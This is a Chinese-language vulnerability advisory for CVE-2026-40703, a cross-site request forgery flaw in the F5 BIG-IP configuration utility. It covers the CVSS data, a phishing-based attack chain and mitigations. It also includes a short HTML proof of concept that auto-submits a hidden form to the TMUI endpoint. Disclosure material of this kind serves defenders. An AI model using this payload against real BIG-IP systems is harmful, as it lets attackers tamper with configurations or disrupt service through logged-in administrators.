CVE-2026-40703 CVSS 5.4 中危

CVE-2026-40703 F5 BIG-IP配置工具CSRF漏洞

披露日期: 2026-05-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-40703

漏洞类型

跨站请求伪造 (CSRF)

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

F5 BIG-IP

漏洞概述

F5 BIG-IP配置实用程序仪表板存在CSRF漏洞。攻击者可诱导已认证管理员执行未授权操作。利用无需认证但需用户交互，可能影响系统完整性和可用性。

技术细节

该漏洞因BIG-IP配置实用程序未充分验证请求源导致。攻击者构造恶意页面诱导管理员点击，浏览器自动携带Session Cookie发送请求。服务器误认为合法操作，执行配置更改。CVSS向量显示利用难度低，需用户交互，影响完整性和可用性。

攻击链分析

STEP 1

1. 钓鱼诱导

攻击者向目标管理员发送包含恶意代码的链接或邮件。

STEP 2

2. 用户交互

管理员在已登录BIG-IP配置界面的情况下点击链接或访问页面。

STEP 3

3. 请求伪造

浏览器在后台向BIG-IP服务器发送未经授权的配置修改请求。

STEP 4

4. 漏洞触发

BIG-IP服务器接收请求并执行，导致配置被篡改或服务中断。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<html>
<body>
<!-- CSRF PoC for CVE-2026-40703 -->
<!-- This simulates a configuration change request -->
<form action="https://<BIG-IP-IP>/tmui/Control/form" method="POST">
    <input type="hidden" name="action" value="modify_config" />
    <input type="submit" value="Click me" />
</form>
<script>
    // Auto submit to simulate attack
    document.forms[0].submit();
</script>
</body>
</html>

影响范围

F5 BIG-IP (详见Security Advisory K35544022)

防御指南

临时缓解措施

建议限制对BIG-IP配置实用程序（TMUI）的访问，仅允许来自受信任网络的连接。管理员应避免在浏览不可信网站时保持登录状态，并在使用完毕后及时注销。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-40703
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-40703
3 Details https://www.cvedetails.com/cve/CVE-2026-40703/
4 VulDB https://vuldb.com/cve/CVE-2026-40703
5 Link https://my.f5.com/manage/s/article/K35544022

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表